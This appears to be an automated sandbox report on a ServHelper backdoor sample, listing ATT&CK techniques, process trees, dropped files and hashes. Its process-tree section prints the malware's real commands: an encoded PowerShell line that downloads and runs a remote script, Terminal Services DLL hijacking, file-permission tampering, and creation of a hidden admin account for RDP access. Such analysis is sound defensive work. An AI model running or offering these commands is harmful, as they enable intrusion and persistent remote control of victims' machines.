servhelper | 2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c

Analysis

max time kernel
138s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-10-2024 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe
Size

5.9MB
MD5

4069c013a2ec0c082f78a73719dcabb7
SHA1

14d643ed38a6c64c299bc24379b5b66ac958aff6
SHA256

2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c
SHA512

5a5bdfa931a1f9a2b8855e6331669404f332f504f15a5eae7fb6e51f7ac99bbb83f5c986931fadb00c761e81617a47707cff811eb6e2ebf55369cec8f6002f05
SSDEEP

49152:pFWJLirb/TkvO90dL3BmAFd4A64nsfJ5mb5KN0ZKrVbLMe8paAzK1X4FXtPqnJ0x:pF8mmMmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net.exenet1.exenet.execmd.exenet1.execmd.exe

pid process

2408 net.exe
2980 net1.exe
1364 net.exe
2224 cmd.exe
1796 net1.exe
780 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 2716 powershell.exe
8 2716 powershell.exe
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

net1.execmd.exenet.exe

pid process

1624 net1.exe
892 cmd.exe
2544 net.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

2776 icacls.exe
2868 icacls.exe
2684 icacls.exe
3024 icacls.exe
380 icacls.exe
2024 takeown.exe
1756 icacls.exe
2804 icacls.exe

pid	process
2408	net.exe
2980	net1.exe
1364	net.exe
2224	cmd.exe
1796	net1.exe
780	cmd.exe

flow	pid	process
7	2716	powershell.exe
8	2716	powershell.exe

pid	process
1624	net1.exe
892	cmd.exe
2544	net.exe

pid	process
2776	icacls.exe
2868	icacls.exe
2684	icacls.exe
3024	icacls.exe
380	icacls.exe
2024	takeown.exe
1756	icacls.exe
2804	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

2992
2992
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2684 icacls.exe
3024 icacls.exe
380 icacls.exe
2024 takeown.exe
1756 icacls.exe
2804 icacls.exe
2776 icacls.exe
2868 icacls.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 raw.githubusercontent.com
7 raw.githubusercontent.com
8 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
2992
2992

pid	process
2684	icacls.exe
3024	icacls.exe
380	icacls.exe
2024	takeown.exe
1756	icacls.exe
2804	icacls.exe
2776	icacls.exe
2868	icacls.exe

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H13T51L08BOHH9D6QP1O.temp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2704 powershell.exe
800 powershell.exe
2716 powershell.exe
2608 powershell.exe
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2184 WMIC.exe

pid	process
2704	powershell.exe
800	powershell.exe
2716	powershell.exe
2608	powershell.exe

pid	process
2184	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30515caf7d1ddb01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

264 reg.exe
Runs net.exe

pid	process
264	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1804	powershell.exe
2608	powershell.exe
2704	powershell.exe
800	powershell.exe
1804	powershell.exe
1804	powershell.exe
1804	powershell.exe
2716	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid process

476
2992
2992
2992
2992
2992

pid	process
476
2992
2992
2992
2992
2992

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2156	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeRestorePrivilege	2804	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2184	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2184	WMIC.exe
Token: SeAuditPrivilege	2184	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2184	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2184	WMIC.exe
Token: SeAuditPrivilege	2184	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2592	WMIC.exe
Token: SeAuditPrivilege	2592	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2592	WMIC.exe
Token: SeAuditPrivilege	2592	WMIC.exe
Token: SeDebugPrivilege	2716	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2156 wrote to memory of 1804	2156	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe	powershell.exe
PID 2156 wrote to memory of 1804	2156	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe	powershell.exe
PID 2156 wrote to memory of 1804	2156	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe	powershell.exe
PID 1804 wrote to memory of 2708	1804	powershell.exe	csc.exe
PID 1804 wrote to memory of 2708	1804	powershell.exe	csc.exe
PID 1804 wrote to memory of 2708	1804	powershell.exe	csc.exe
PID 2708 wrote to memory of 1812	2708	csc.exe	cvtres.exe
PID 2708 wrote to memory of 1812	2708	csc.exe	cvtres.exe
PID 2708 wrote to memory of 1812	2708	csc.exe	cvtres.exe
PID 1804 wrote to memory of 2608	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 2608	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 2608	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 2704	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 2704	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 2704	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 800	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 800	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 800	1804	powershell.exe	powershell.exe
PID 1804 wrote to memory of 2024	1804	powershell.exe	takeown.exe
PID 1804 wrote to memory of 2024	1804	powershell.exe	takeown.exe
PID 1804 wrote to memory of 2024	1804	powershell.exe	takeown.exe
PID 1804 wrote to memory of 1756	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 1756	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 1756	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2804	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2804	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2804	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2776	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2776	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2776	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2868	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2868	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2868	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2684	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2684	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2684	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 3024	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 3024	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 3024	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 380	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 380	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 380	1804	powershell.exe	icacls.exe
PID 1804 wrote to memory of 2440	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 2440	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 2440	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 264	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 264	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 264	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 916	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 916	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 916	1804	powershell.exe	reg.exe
PID 1804 wrote to memory of 2496	1804	powershell.exe	net.exe
PID 1804 wrote to memory of 2496	1804	powershell.exe	net.exe
PID 1804 wrote to memory of 2496	1804	powershell.exe	net.exe
PID 2496 wrote to memory of 2220	2496	net.exe	net1.exe
PID 2496 wrote to memory of 2220	2496	net.exe	net1.exe
PID 2496 wrote to memory of 2220	2496	net.exe	net1.exe
PID 1804 wrote to memory of 304	1804	powershell.exe	cmd.exe
PID 1804 wrote to memory of 304	1804	powershell.exe	cmd.exe
PID 1804 wrote to memory of 304	1804	powershell.exe	cmd.exe
PID 304 wrote to memory of 1500	304	cmd.exe	cmd.exe
PID 304 wrote to memory of 1500	304	cmd.exe	cmd.exe
PID 304 wrote to memory of 1500	304	cmd.exe	cmd.exe
PID 1500 wrote to memory of 408	1500	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zykyxe9e.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB636.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB635.tmp"
      4⤵
      PID:1812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:800
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2024
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1756
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2776
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2868
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2684
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3024
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:380
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2440
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:264
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:916
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:304
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1500
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:408
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1084
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2016
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:2996
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:2988
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2564
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:956

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:892
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:2544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:1624

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc DRVCgas3 /add
1⤵
PID:2908
- C:\Windows\system32\net.exe
  net.exe user wgautilacc DRVCgas3 /add
  2⤵
  PID:2128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc DRVCgas3 /add
    3⤵
    PID:1664

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2224
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1796

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MXQFNXLT$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:780
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MXQFNXLT$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MXQFNXLT$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2980

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:3064
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:3028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3060

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc DRVCgas3
1⤵
PID:584
- C:\Windows\system32\net.exe
  net.exe user wgautilacc DRVCgas3
  2⤵
  PID:1256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc DRVCgas3
    3⤵
    PID:2064

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2192
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2184

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2880
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2592

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2968
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB636.tmp

Filesize
1KB

MD5
8083600608202552a21faf93cf91c5f3

SHA1
fd292fca90c3b318e264a3a1074116e2f0589315

SHA256
4136257cac201a1ea14aec7feed13f0e24db975da83ad6a786d21a6b101a164f

SHA512
8f5312b3c2fd982d2917968900bf051073cc9dfb893de26b33100991198c241141ac5ec28443d98667904b98513580595085eba446ee9b6b6d221dab5e94e307

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
c4bcb62d200b6aa544ed9e5b3399c975

SHA1
7808d467e453b9a8de354af3dab0d10c3e32bee0

SHA256
bd62d13d4264bbd68697866bb1975e7f2fa0b591d71a67856c9a5e7b081beba7

SHA512
87005bc71aa53c5a880d5401378d024033dd0401f267119be02a2d991258becc95916313a55bbe359ec39325593e17b87af02a30cbed2c82672ccea2ac0af745

Download Submit
C:\Users\Admin\AppData\Local\Temp\zykyxe9e.dll

Filesize
3KB

MD5
61f6af5c621a3b9fc938eea7a375bf4b

SHA1
6345ddcc401b9f63f67fb50757784d76d9b449d2

SHA256
d899a604a044b282cbea357643dc323b6d38920c6ac2ae336d05422b20e9773a

SHA512
b314d133353849b99e46d9c31db67a79469d4aa7659e5682666c3888cbbeaf09e83a959703361d0720db427b629b9598053bba2ac16afc6805a1f3cda74e5b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\zykyxe9e.pdb

Filesize
7KB

MD5
2cd97efafd9f0670447b2971db4c06d7

SHA1
8c6eba1e959fae29f40c506d0caf7def686b7744

SHA256
208d357a604f197f8018cb75cd16f001294f16bc048d392a5f7a5f0a5957c304

SHA512
1b6ac5fd029d85551f09e148ecd99d758d371aada9c4dce83c8ffd3c9065cddcc2dc60b73c560005df8872996a9cdca4a7609b68fb0f33c028ff030c35c11052

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
26676e596b41f45ec3a8997727b7a58c

SHA1
842fbaa971b6c2439663937e156736c97241b074

SHA256
67eabbf72c87cd677b24ffb35f0855d46239ffaea18ec19c0ac12315869dc9ed

SHA512
bab1b31c5f7db0fa35eb62ab3748bb3d062d6019bf1356fee8d240e44266c71522d35e58089ca6196a5399e7ac9f4720507a61331b485c14a1b0c0cc2686cd6a

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
